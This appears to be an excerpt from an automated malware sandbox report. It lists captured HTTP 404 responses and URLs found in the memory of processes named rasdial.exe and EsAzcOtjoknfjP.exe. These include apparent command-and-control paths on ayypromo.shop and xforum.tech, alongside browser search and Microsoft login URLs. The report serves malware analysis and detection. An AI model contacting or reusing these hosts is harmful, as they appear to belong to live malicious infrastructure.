            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 26 Aug 2024 16:28:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 26 Aug 2024 16:28:25 GMTContent-Type: text/htmlContent-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 26 Aug 2024 16:28:31 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 26 Aug 2024 16:28:34 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 26 Aug 2024 16:28:36 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 26 Aug 2024 16:28:39 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 26 Aug 2024 16:28:45 GMT | Server: Apache | Content-Length: 13840 | Connection: close | Content-Type: text/html
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 26 Aug 2024 16:28:47 GMT | Server: Apache | Content-Length: 13840 | Connection: close | Content-Type: text/html
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 26 Aug 2024 16:28:50 GMT | Server: Apache | Content-Length: 13840 | Connection: close | Content-Type: text/html
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 26 Aug 2024 16:28:52 GMT | Server: Apache | Content-Length: 13840 | Connection: close | Content-Type: text/html; charset=utf-8
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Mon, 26 Aug 2024 16:29:13 GMT | Content-Type: text/html | Content-Length: 3971 | Connection: close | ETag: "6526681e-f83"
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Mon, 26 Aug 2024 16:29:15 GMT | Content-Type: text/html | Content-Length: 3971 | Connection: close | ETag: "6526681e-f83"
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Mon, 26 Aug 2024 16:29:18 GMT | Content-Type: text/html | Content-Length: 3971 | Connection: close | ETag: "6526681e-f83"
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Mon, 26 Aug 2024 16:29:20 GMT | Content-Type: text/html | Content-Length: 3971 | Connection: close | ETag: "6526681e-f83"
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: ddos-guard | Connection: close | Set-Cookie: __ddg1_=gIrdR1B1Q86dlX2I5Y9n; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Tue, 26-Aug-2025 16:29:34 GMT | Date: Mon, 26 Aug 2024 16:29:34 GMT | Content-Type: text/html; charset=UTF-8 | Content-Length: 340 | Last-Modified: Tue, 29 May 2018 17:41:27 GMT | ETag: "154-56d5bbe607fc0" | Accept-Ranges: bytes | X-Frame-Options: SAMEORIGIN | Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: ddos-guard | Connection: close | Set-Cookie: __ddg1_=qcu0yVM64DDVZF4bCVJ1; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Tue, 26-Aug-2025 16:29:37 GMT | Date: Mon, 26 Aug 2024 16:29:37 GMT | Content-Type: text/html; charset=UTF-8 | Content-Length: 340 | Last-Modified: Tue, 29 May 2018 17:41:27 GMT | ETag: "154-56d5bbe607fc0" | Accept-Ranges: bytes | X-Frame-Options: SAMEORIGIN | Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: ddos-guard | Connection: close | Set-Cookie: __ddg1_=fVu3sRgjivEndIImLJFH; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Tue, 26-Aug-2025 16:29:39 GMT | Date: Mon, 26 Aug 2024 16:29:39 GMT | Content-Type: text/html; charset=UTF-8 | Content-Length: 340 | Last-Modified: Tue, 29 May 2018 17:41:27 GMT | ETag: "154-56d5bbe607fc0" | Accept-Ranges: bytes | X-Frame-Options: SAMEORIGIN | Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: ddos-guard | Connection: close | Set-Cookie: __ddg1_=4zeL29F342mINNAYsAPa; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Tue, 26-Aug-2025 16:29:42 GMT | Date: Mon, 26 Aug 2024 16:29:42 GMT | Content-Type: text/html; charset=UTF-8 | Content-Length: 340 | Last-Modified: Tue, 29 May 2018 17:41:27 GMT | ETag: "154-56d5bbe607fc0" | X-Frame-Options: SAMEORIGIN | Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000056B4000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003874000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2373155409.000000000AD44000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/css/print.css?ver=1.4
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/polyfills.js?ver=1.4
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/primary-navigation.js?ver=1.4
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js?ver=1.4
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/style.css?ver=1.4
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/uploads/2021/09/fondo-plumber-1000x429-1.jpg
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000061B2000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000004372000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://nginx.net/
            Source: EsAzcOtjoknfjP.exe, 00000008.00000002.3521236665.0000000005965000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ayypromo.shop
            Source: EsAzcOtjoknfjP.exe, 00000008.00000002.3521236665.0000000005965000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ayypromo.shop/rgqx/
            Source: EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000004372000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.redhat.com/
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000061B2000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000004372000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.redhat.com/docs/manuals/enterprise/
            Source: EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.00000000041E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xforum.tech/647x/?3L9l=FnaXBox54
            Source: rasdial.exe, 00000006.00000002.3521925818.0000000007DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://api.w.org/
            Source: rasdial.exe, 00000006.00000002.3521925818.0000000007DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: rasdial.exe, 00000006.00000002.3521925818.0000000007DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: rasdial.exe, 00000006.00000002.3521925818.0000000007DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: rasdial.exe, 00000006.00000002.3521925818.0000000007DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: rasdial.exe, 00000006.00000002.3521925818.0000000007DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: rasdial.exe, 00000006.00000002.3521925818.0000000007DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://es.wordpress.org/
            Source: rasdial.exe, 00000006.00000002.3518674647.0000000003074000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: rasdial.exe, 00000006.00000002.3518674647.0000000003074000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: rasdial.exe, 00000006.00000002.3518674647.0000000003074000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: rasdial.exe, 00000006.00000002.3518674647.0000000003074000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
            Source: rasdial.exe, 00000006.00000002.3518674647.0000000003074000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033du
            Source: rasdial.exe, 00000006.00000002.3518674647.0000000003074000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: rasdial.exe, 00000006.00000002.3518674647.0000000003074000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: rasdial.exe, 00000006.00000003.2261768573.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/
